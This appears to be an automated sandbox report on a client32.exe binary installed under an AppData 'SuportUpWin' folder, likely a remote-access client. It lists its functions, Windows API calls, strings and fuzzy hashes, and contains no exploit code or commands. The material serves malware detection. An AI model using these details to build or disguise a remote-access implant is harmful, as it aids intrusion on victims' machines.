Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
Opcode Fuzzy Hash: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2

Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52

Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC

_free.LIBCMT ref: 1100EE64

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1100EE77
_free.LIBCMT ref: 1100EE8A
_free.LIBCMT ref: 1100EE9D

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51

Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

wsprintfA.USER32 ref: 1114650E
wsprintfA.USER32 ref: 11146524

Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A38400,?), ref: 11143E97
Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF

Strings

NSM.LIC, xrefs: 111464F3
%sNSM.LIC, xrefs: 11146508
%sNSA.LIC, xrefs: 1114651E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1

Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 110F4B8A
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
TranslateMessage.USER32(?), ref: 110F4BC4
DispatchMessageA.USER32(?), ref: 110F4BCA
CoUninitialize.OLE32 ref: 110F4BE6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchInitializeTranslateUninitialize
String ID:
API String ID: 3550192930-0
Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61

Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A38400,?), ref: 11143E97
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
CloseHandle.KERNEL32(00000000), ref: 11143EBF

Strings

", xrefs: 11143E4E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750

Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,0BAD89F8,771B2EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA

Strings

Client, xrefs: 1102D863
DisableGeolocation, xrefs: 1102D85E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
Opcode Fuzzy Hash: 4f9a6887a53d08cfe871fa0f2f67aa86f35001991e889a0500aa779ebc83bfef
Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88

Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A

Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75A33760,00000000,75A4A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4

TranslateMessage.USER32(?), ref: 11027850
DispatchMessageA.USER32(?), ref: 11027856

Strings

Exit Msgloop, quit=%d, xrefs: 1102788D

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5

Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110179ED

Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 1101792C
Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0

Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000324,000000FF), ref: 11017842
Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0

SetEvent.KERNEL32(00000324), ref: 11017A0D
GetTickCount.KERNEL32 ref: 11017A13

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1

Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785

Strings

Client, xrefs: 1113875C
*AutoICFConfig, xrefs: 11138757

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755

Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 11070FE7
EnterCriticalSection.KERNEL32(?), ref: 11070FF4
LeaveCriticalSection.KERNEL32(?), ref: 110710C6

Strings

Push, xrefs: 11070FB6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90

Function 00651020 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00651027
GetStartupInfoW.KERNEL32(?), ref: 00651081
GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?), ref: 0065109C
ExitProcess.KERNEL32 ref: 006510A9

Memory Dump Source

Source File: 00000003.00000002.3698267949.0000000000651000.00000020.00000001.01000000.00000007.sdmp, Offset: 00650000, based on PE: true

Associated: 00000003.00000002.3697347028.0000000000650000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_650000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: f59eb50c02ae130bbbc131efa8dd606c5ca49e8bbcacb37057854b80a5da94cd
Instruction ID: a56eccb439bcc3dc1cd6e2827e4703fb23f28ed2cb22b3b5811e298592c1b47f
Opcode Fuzzy Hash: f59eb50c02ae130bbbc131efa8dd606c5ca49e8bbcacb37057854b80a5da94cd
Instruction Fuzzy Hash: C601C065C003A196DB306F9088053FB76BAAF12383F514415ECCAAB2C1FB648CC9C2A5

Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
CloseHandle.KERNEL32(?), ref: 11030DC9
FreeLibrary.KERNEL32(?), ref: 11030DD4
CloseHandle.KERNEL32(00000000), ref: 11030DDB

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$FreeLibraryObjectSingleWait
String ID:
API String ID: 1314093303-0
Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40

Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe,00000104,?,11144A43,?), ref: 11144819

Strings

C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, xrefs: 11144804, 11144812

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
